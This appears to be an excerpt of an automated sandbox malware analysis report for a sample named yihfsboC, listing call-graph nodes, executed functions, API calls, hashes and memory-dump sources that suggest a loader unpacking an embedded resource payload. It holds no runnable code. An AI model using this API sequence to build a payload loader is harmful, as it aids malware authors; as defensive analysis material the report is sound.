55238->55247 55242 29c41000 55241->55242 55243 29c41028 55242->55243 55253 29c410d4 55242->55253 55262 29c41088 55242->55262 55270 29c41087 55242->55270 55243->55243 55248 29c41000 55247->55248 55249 29c41028 55248->55249 55250 29c410d4 2 API calls 55248->55250 55251 29c41087 2 API calls 55248->55251 55252 29c41088 2 API calls 55248->55252 55250->55249 55251->55249 55252->55249 55254 29c41092 55253->55254 55255 29c410e2 55253->55255 55278 29c41f28 55254->55278 55282 29c41f38 55254->55282 55256 29c41097 55286 29c45f90 55256->55286 55295 29c45fa8 55256->55295 55257 29c410d1 55257->55243 55263 29c41092 55262->55263 55268 29c41f28 2 API calls 55263->55268 55269 29c41f38 2 API calls 55263->55269 55264 29c41097 55266 29c45f90 2 API calls 55264->55266 55267 29c45fa8 2 API calls 55264->55267 55265 29c410d1 55265->55243 55266->55265 55267->55265 55268->55264 55269->55264 55271 29c41092 55270->55271 55276 29c41f28 2 API calls 55271->55276 55277 29c41f38 2 API calls 55271->55277 55272 29c41097 55274 29c45f90 2 API calls 55272->55274 55275 29c45fa8 2 API calls 55272->55275 55273 29c410d1 55273->55243 55274->55273 55275->55273 55276->55272 55277->55272 55279 29c41f68 55278->55279 55280 29c42240 55279->55280 55281 29c40dc0 2 API calls 55279->55281 55280->55256 55281->55280 55283 29c41f68 55282->55283 55284 29c42240 55283->55284 55285 29c40dc0 2 API calls 55283->55285 55284->55256 55285->55284 55288 29c460d9 55286->55288 55289 29c45fd9 55286->55289 55287 29c45fe5 55287->55257 55288->55257 55289->55287 55304 29c46220 55289->55304 55307 29c4621f 55289->55307 55290 29c46025 55293 29b58669 GetModuleHandleW 55290->55293 55294 29b58678 GetModuleHandleW 55290->55294 55293->55288 55294->55288 55297 29c45fd9 55295->55297 55299 29c460d9 55295->55299 55296 29c45fe5 55296->55257 55297->55296 55300 29c46220 2 API calls 55297->55300 55301 29c4621f 2 API calls 55297->55301 55298 29c46025 55302 29b58669 GetModuleHandleW 55298->55302 55303 29b58678 GetModuleHandleW 55298->55303 55299->55257 55300->55298 55301->55298 55302->55299 55303->55299 55305 29c4622a 55304->55305 55310 29c46251 55304->55310 55305->55290 55309 29c46251 2 API calls 55307->55309 55308 29c4622a 55308->55290 55309->55308 55311 29c46271 55310->55311 55313 29c4628c 55310->55313 55315 29b577cc GetModuleHandleW 55311->55315 55316 29b590d9 GetModuleHandleW 55311->55316 55312 29c4627c 55312->55313 55314 29c46251 GetModuleHandleW GetModuleHandleW 55312->55314 55313->55305 55314->55313 55315->55312 55316->55312 55318 29c4b6b8 DispatchMessageW 55317->55318 55319 29c4b745 55318->55319 55319->55229

                                                                                                                  Executed Functions

                                                                                                                  Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 32 401cd0-401cd4 24->32 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 41 401f1c-401f2f 31->41 42 401f5f-401f69 31->42 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 46 401ce2-401cea 38->46 39->40 40->25 47 401cf9-401d09 Module32Next 40->47 43 401f33-401f5d call 401560 41->43 44 401f73-401f75 42->44 45 401f6b-401f72 42->45 43->42 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->32 46->39 47->7 51 401d0f 47->51 49->5 86 4021aa-4021c0 49->86 50->49 55 401d10-401d2e call 401650 51->55 61 401d30-401d34 55->61 62 401d50-401d52 61->62 63 401d36-401d38 61->63 67 401d55-401d57 62->67 65 401d3a-401d40 63->65 66 401d4c-401d4e 63->66 65->62 69 401d42-401d4a 65->69 66->67 67->25 70 401d5d-401d7b call 401650 67->70 69->61 69->66 77 401d80-401d84 70->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 84 401da5-401da7 79->84 82 401d8a-401d90 80->82 83 401d9c-401d9e 80->83 82->79 87 401d92-401d9a 82->87 83->84 84->25 85 401dad-401dbd Module32Next 84->85 85->7 85->55 89 4021c6-4021ca 86->89 90 40246a-402470 86->90 87->77 87->83 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 94 402482-402487 93->94 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 2410d007 122->154 155 40234e call 2410d01d 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 2410d007 135->152 153 402390 call 2410d01d 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                                                  APIs
                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                  • _getenv.LIBCMT ref: 00401ABA
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                  • Module32First.KERNEL32 ref: 00401C48
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                  • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                  • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                  • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                  • _malloc.LIBCMT ref: 00401EBA
                                                                                                                  • _memset.LIBCMT ref: 00401EDD
                                                                                                                  • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                  • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                  • API String ID: 1430744539-2962942730
                                                                                                                  • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                  • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                  • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                  • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                  Function 29932C08 Relevance: 4.3, Strings: 1, Instructions: 3071COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: N
                                                                                                                  • API String ID: 0-1130791706
                                                                                                                  • Opcode ID: e5c94f16dd69ad8bf376aa22ae052231c2cf979edf2a8a5ea46e4c6262053866
                                                                                                                  • Instruction ID: 5a049bb9f104cea336f7e6a64a496fcf583d43e6fd916e0fb99b76502b3eb5ab
                                                                                                                  • Opcode Fuzzy Hash: e5c94f16dd69ad8bf376aa22ae052231c2cf979edf2a8a5ea46e4c6262053866
                                                                                                                  • Instruction Fuzzy Hash: E273F431C1075A8EDB10EF68C854A99FBB1FF99310F51C6DAE44867221EB70AAC5CF85
                                                                                                                  Function 29937138 Relevance: 3.5, Strings: 1, Instructions: 2263COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: K
                                                                                                                  • API String ID: 0-856455061
                                                                                                                  • Opcode ID: 1bfab8a7f7976a4bb97ada9220e01e144b97aec92684d1aa0d2a39018aad62ce
                                                                                                                  • Instruction ID: 4b6821f6d5199854529f8020fd3d7ae743890f435d89612c12e521957ab55116
                                                                                                                  • Opcode Fuzzy Hash: 1bfab8a7f7976a4bb97ada9220e01e144b97aec92684d1aa0d2a39018aad62ce
                                                                                                                  • Instruction Fuzzy Hash: 09330330C147198EDB11EF68C894A9DFBB1FF99300F50D69AD4486B261EB70AAC5CF85
                                                                                                                  Function 28DFE660 Relevance: 1.9, APIs: 1, Instructions: 374COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1739 28dfe660-28dfe68f 1740 28dfe696-28dfe72f call 28dfb7b0 1739->1740 1741 28dfe691 1739->1741 1745 28dfe7ce-28dfe7d4 1740->1745 1741->1740 1746 28dfe7da-28dfe7f2 1745->1746 1747 28dfe734-28dfe747 1745->1747 1748 28dfe806-28dfe819 1746->1748 1749 28dfe7f4-28dfe801 1746->1749 1750 28dfe74e-28dfe79f 1747->1750 1751 28dfe749 1747->1751 1753 28dfe81b 1748->1753 1754 28dfe820-28dfe83c 1748->1754 1752 28dfebf1-28dfecee 1749->1752 1768 28dfe7b2-28dfe7c4 1750->1768 1769 28dfe7a1-28dfe7af 1750->1769 1751->1750 1760 28dfecf6-28dfed00 1752->1760 1761 28dfecf0-28dfecf5 call 28dfb7b0 1752->1761 1753->1754 1756 28dfe83e 1754->1756 1757 28dfe843-28dfe883 call 28df0a60 1754->1757 1756->1757 1770 28dfe88a-28dfe8bc 1757->1770 1771 28dfe885 1757->1771 1761->1760 1772 28dfe7cb 1768->1772 1773 28dfe7c6 1768->1773 1769->1746 1776 28dfe8be 1770->1776 1777 28dfe8c3-28dfe905 1770->1777 1771->1770 1772->1745 1773->1772 1776->1777 1779 28dfe90c-28dfe915 1777->1779 1780 28dfe907 1777->1780 1781 28dfeb76-28dfeb7c 1779->1781 1780->1779 1782 28dfe91a-28dfe93f 1781->1782 1783 28dfeb82-28dfeb95 1781->1783 1786 28dfe946-28dfe97d 1782->1786 1787 28dfe941 1782->1787 1784 28dfeb9c-28dfebb7 1783->1784 1785 28dfeb97 1783->1785 1788 28dfebbe-28dfebd2 1784->1788 1789 28dfebb9 1784->1789 1785->1784 1795 28dfe97f 1786->1795 1796 28dfe984-28dfe9d2 call 28df0a60 1786->1796 1787->1786 1793 28dfebd9-28dfebef LdrInitializeThunk 1788->1793 1794 28dfebd4 1788->1794 1789->1788 1793->1752 1794->1793 1795->1796 1800 28dfea36-28dfea49 1796->1800 1801 28dfe9d4-28dfe9f9 1796->1801 1802 28dfea4b 1800->1802 1803 28dfea50-28dfea91 call 28df0a60 1800->1803 1804 28dfe9fb 1801->1804 1805 28dfea00-28dfea2e 1801->1805 1802->1803 1810 28dfea93-28dfea94 1803->1810 1811 28dfeaa0-28dfead8 1803->1811 1804->1805 1805->1800 1810->1783 1812 28dfeadf-28dfeb41 1811->1812 1813 28dfeada 1811->1813 1818 28dfeb48-28dfeb6c 1812->1818 1819 28dfeb43 1812->1819 1813->1812 1821 28dfeb6e 1818->1821 1822 28dfeb73 1818->1822 1819->1818 1821->1822 1822->1781
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2543136434.0000000028DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28DF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_28df0000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 52d1adedf97c1d2253334b4d784d1d3c4f4771baa00001636bd146bef4411786
                                                                                                                  • Instruction ID: a26a77d392d920cd2078a1f885c03db8f86cc09b9df2ed5040ef45f74e404ce9
                                                                                                                  • Opcode Fuzzy Hash: 52d1adedf97c1d2253334b4d784d1d3c4f4771baa00001636bd146bef4411786
                                                                                                                  • Instruction Fuzzy Hash: E402E474D01218CFDB24DFA9C884B9DBBB2BF88344F1581A9D848AB395DB349E85DF50
                                                                                                                  Function 29951D28 Relevance: .8, Instructions: 801COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 88cbc79630c21233a5b1e7bd6e1ccde81ed3339a142f164acad738e3f55d4a18
                                                                                                                  • Instruction ID: 47ed6f4106f7aab7cabb70b4a22164dba67331a4c6b4bc39bf831b679972979c
                                                                                                                  • Opcode Fuzzy Hash: 88cbc79630c21233a5b1e7bd6e1ccde81ed3339a142f164acad738e3f55d4a18
                                                                                                                  • Instruction Fuzzy Hash: 38929F74E012288FDBA4DF65C898B9EBBB2BF88300F1081E9D44DA7261DB345E85CF50
                                                                                                                  Function 299562B0 Relevance: .7, Instructions: 740COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7dca8b3bf9294fccdd7a1cf75cc2250ba0fde1a62e48a8b612bb670f0d3cfad5
                                                                                                                  • Instruction ID: b9491dc7c4875f835245444f0567ac5b1c28d9faa4bf6ccaa1d557f2d28e9e71
                                                                                                                  • Opcode Fuzzy Hash: 7dca8b3bf9294fccdd7a1cf75cc2250ba0fde1a62e48a8b612bb670f0d3cfad5
                                                                                                                  • Instruction Fuzzy Hash: E8826B74E012288FEBA5DF69C994BDEBBB2BF88300F1081E9D50DA7250DB315E859F51
                                                                                                                  Function 29955480 Relevance: .7, Instructions: 728COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fc1098ca8db2347b9222d0e8166ccfb51743ed6b812387c11ab591570fb7fd51
                                                                                                                  • Instruction ID: 8bc5c6599b1540054a2f70355d2413936c938995e6b82888ac129310f5cb2436
                                                                                                                  • Opcode Fuzzy Hash: fc1098ca8db2347b9222d0e8166ccfb51743ed6b812387c11ab591570fb7fd51
                                                                                                                  • Instruction Fuzzy Hash: 5B828D74E012288FEBA4DF69C994BDEBBB2AF89300F1081E9D40DA7251DB315E85DF51
                                                                                                                  Function 299599E8 Relevance: .3, Instructions: 321COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 289e50ad10439fef59d77d04fc3c344b41f5ac8c482637ab973f95c6eb9c220b
                                                                                                                  • Instruction ID: 5091e35eb2ba222e840fbeb2e97afcb95db874c435393b4556cf0a05982ac1ee
                                                                                                                  • Opcode Fuzzy Hash: 289e50ad10439fef59d77d04fc3c344b41f5ac8c482637ab973f95c6eb9c220b
                                                                                                                  • Instruction Fuzzy Hash: B4F1AE74E01228CFEB64DF69C884B9DBBB2BF98300F5081AAD909A7350DB355E85DF50
                                                                                                                  Function 29951198 Relevance: .3, Instructions: 319COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6acb5a440a3dc2bd1f291d0d4150ff635696a57f6537e340159d6479147ca676
                                                                                                                  • Instruction ID: 746efb382d1a992f7caa48904095be83ed502083f08ae69194dae2a8fde94a2f
                                                                                                                  • Opcode Fuzzy Hash: 6acb5a440a3dc2bd1f291d0d4150ff635696a57f6537e340159d6479147ca676
                                                                                                                  • Instruction Fuzzy Hash: E9F19F74E01228CFDB64DFA9C884B9DBBB2BF59300F1081AAD509A7350DB355E85DF50
                                                                                                                  Function 2995A580 Relevance: .3, Instructions: 319COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bfd7dda4d01a9b7c8f192464ed836aa0f9f69bc2ed5e824d9fb9306adc1bedc0
                                                                                                                  • Instruction ID: bc4ab3188e6a3d0bfae37cab9ce55377872d8c351eabd5b1ea5064f7bc32159c
                                                                                                                  • Opcode Fuzzy Hash: bfd7dda4d01a9b7c8f192464ed836aa0f9f69bc2ed5e824d9fb9306adc1bedc0
                                                                                                                  • Instruction Fuzzy Hash: 94F1AD74E01228CFDB64DFA9C894B9EBBB2BF98300F1081AAD509A7350DB355E85DF50
                                                                                                                  Function 29959FB8 Relevance: .3, Instructions: 319COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a5804b6dabb70c994095bded3f070dcf9d263e64cf58b5803633b2026058768d
                                                                                                                  • Instruction ID: 3218b2674aa8abfa4f179fe2097df46c57d1b97d414355bcea9989d008a09c18
                                                                                                                  • Opcode Fuzzy Hash: a5804b6dabb70c994095bded3f070dcf9d263e64cf58b5803633b2026058768d
                                                                                                                  • Instruction Fuzzy Hash: 6BF1AD74E01228CFDB64DFA9C884B9EBBB2BF99300F1081AAD549A7350DB355E85DF50
                                                                                                                  Function 29950BD0 Relevance: .3, Instructions: 319COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c897148dabc76b6c35fb3ecd0fba94acabe14f9ef8b8b798beb3bf0f1dfc0fb3
                                                                                                                  • Instruction ID: 6e8e04d5d77c4a17257615bc02928fecfa38021dc4827690b59250e2b05dfdd5
                                                                                                                  • Opcode Fuzzy Hash: c897148dabc76b6c35fb3ecd0fba94acabe14f9ef8b8b798beb3bf0f1dfc0fb3
                                                                                                                  • Instruction Fuzzy Hash: 9AF19D74E01228CFDB64DFA9C884B9EBBB2BF98300F1081AAD509A7350DB355E85DF50
                                                                                                                  Function 299593F8 Relevance: .3, Instructions: 319COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a49105865beddbbe24cbf88b60b21040a601cff976a7777c84253329905787f3
                                                                                                                  • Instruction ID: 563b336925ac72d09c142d43753be7d5ab8a0638e00eb675d5c23a0a45f3af59
                                                                                                                  • Opcode Fuzzy Hash: a49105865beddbbe24cbf88b60b21040a601cff976a7777c84253329905787f3
                                                                                                                  • Instruction Fuzzy Hash: A4F1BE74E01228CFEB64DFA9C884B9DBBB2BF88300F5081AAD509A7350DB355E85DF50
                                                                                                                  Function 29957710 Relevance: .3, Instructions: 319COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a1a31ec85d4e44ee9439643d229ed35178eb72522bf457ab560f3951b9559970
                                                                                                                  • Instruction ID: d005e226db8feb63a370e7cb383deb5a36db8de3630a1e46abe57f92cd4e0b60
                                                                                                                  • Opcode Fuzzy Hash: a1a31ec85d4e44ee9439643d229ed35178eb72522bf457ab560f3951b9559970
                                                                                                                  • Instruction Fuzzy Hash: B8F19D74E01228CFDB64DFA9C884B9EBBB2BF99300F1081AAD549A7350DB355E85DF50
                                                                                                                  Function 2995B110 Relevance: .3, Instructions: 319COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a2e40030148d49801a8e7ee6d2ea79ef4e8ab5f07e51eb471421834fd82b6fe2
                                                                                                                  • Instruction ID: 88e0d1fbbbf4dd30ed1fd1b4922b3469d3a6f4a06dad6cad1a00d735b458ae35
                                                                                                                  • Opcode Fuzzy Hash: a2e40030148d49801a8e7ee6d2ea79ef4e8ab5f07e51eb471421834fd82b6fe2
                                                                                                                  • Instruction Fuzzy Hash: EAF1AD74E01228CFDB64DFA9C894B9EBBB2BF99300F1081AAD509A7350DB355E85DF50
                                                                                                                  Function 29957120 Relevance: .3, Instructions: 319COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 09dd836c99abb54467788f5e98f8c4d57ab75795a68e33d83cd441366cbd533b
                                                                                                                  • Instruction ID: d08552c639d29116eef284a6e3a5e11948af27a72dcfda4c876a91ebefda0e16
                                                                                                                  • Opcode Fuzzy Hash: 09dd836c99abb54467788f5e98f8c4d57ab75795a68e33d83cd441366cbd533b
                                                                                                                  • Instruction Fuzzy Hash: 63F1AC74E01228CFDB64DFA9C884B9EBBB2BF99300F5081AAD509A7350DB355E85DF50
                                                                                                                  Function 2995AB48 Relevance: .3, Instructions: 319COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ffc8ead3204a3481c8c1e1c208387a32bb6dcb9e95a0c3e66f56e98c7c5e722a
                                                                                                                  • Instruction ID: 5b9bc13f7bc972c93e7a270f74405f79d8c6c1174579321752eed6e1c96266ab
                                                                                                                  • Opcode Fuzzy Hash: ffc8ead3204a3481c8c1e1c208387a32bb6dcb9e95a0c3e66f56e98c7c5e722a
                                                                                                                  • Instruction Fuzzy Hash: 49F1AD74E01228CFDB64DFA9C884B9EBBB2BF99300F1081AAD549A7350DB355E85DF50
                                                                                                                  Function 29951760 Relevance: .3, Instructions: 319COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: da2dd5cda5a9d34cb008c1cc0e48dd578401de2b98c9edbad28419521044fd08
                                                                                                                  • Instruction ID: c48319be05b8fc1a01df63daeebea6f5b95eff586eb33f4a4f7ad3aae650e144
                                                                                                                  • Opcode Fuzzy Hash: da2dd5cda5a9d34cb008c1cc0e48dd578401de2b98c9edbad28419521044fd08
